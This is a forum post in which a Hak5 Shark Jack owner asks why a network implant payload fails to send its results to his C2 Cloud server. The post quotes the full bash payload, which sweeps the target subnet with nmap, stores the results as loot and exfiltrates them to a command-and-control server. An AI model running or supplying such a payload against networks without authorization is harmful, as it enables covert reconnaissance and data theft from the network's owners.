Hi Forum
I've bought an essentialKit , and have the most of it running as expected.
I've downloaded the payload from Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2
The Sharkjack is updated to to latest Firmware - Version 1.1.0, and I can see the Sharkjack does everything that I want, the Loot are created etc.
I can see that during execution of the payload, that the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud.
As I can see - it should'n be an issue with my C2 Cloud - since I have Wifi Pineapple, lan Turtle and Squirrel running and connecting to C2 Cloud.
How can I check this further, since as I can see - I can not SSH to the sharkjack during run of the payloads. And have tried reconfiguring my C2 Cloud settngs on the jack several times with out any luck.
The Executed payload:
#!/bin/bash
#
# Title: Nmap Payload for Shark Jack w/ C2
# Author: Hak5 (modifications from REDD)
# Version: 1.1
#
# All credit goes to Hak5 Team. I just through in a simple check for if
# C2 is provisioned in the SharkJack. - If so, exfiltrate!
#
# Scans target subnet with Nmap using specified options. Saves each scan result
# to loot storage folder. Exfiltrates all scans to C2 if provisioned.
#
# LED SETUP ... Obtaining IP address from DHCP
# LED ATTACK ... Scanning
# LED FINISH ... Scan Complete
#
# See nmap --help for options. Default "-sP" ping scans the address space for
# fast host discovery.
C2PROVISION="/etc/device.config"
NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
LOOT_DIR=/root/loot/nmap
# Setup loot directory, DHCP client, and determine subnet
LED SETUP
mkdir -p $LOOT_DIR
COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
NETMODE DHCP_CLIENT
while [ -z "$SUBNET" ]; do
sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
done
# Scan network
LED ATTACK
nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt
# Exfiltrate Loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
LED SPECIAL
# Connect to Cloud C2
C2CONNECT
# Wait until Cloud C2 connection is established
while ! pgrep cc-client; do sleep 1; done
# Exfiltrate all test loot files
FILES="$LOOT_DIR/*.txt"
for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
else
# Exit script if not provisioned for C2
LED R SOLID
exit 1
fi
LED FINISH
sleep 2 && halt
Can I Just disable the last 2 lines - so I can SSh into the jack to see what and if there's an error while trying to connect to my C2 Cloud
Since everything else is working as intended - I do not get why I can't get this Sharkjack to deliever to my C2 Cloud.
Any ideas of what is wrong
/P